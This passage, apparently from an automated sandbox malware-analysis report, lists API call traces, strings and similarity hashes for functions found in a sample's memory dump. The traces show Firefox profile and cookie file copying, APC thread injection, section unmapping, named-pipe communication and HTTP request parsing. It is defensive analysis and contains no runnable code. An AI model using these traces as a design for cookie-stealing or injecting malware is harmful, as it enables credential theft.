  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
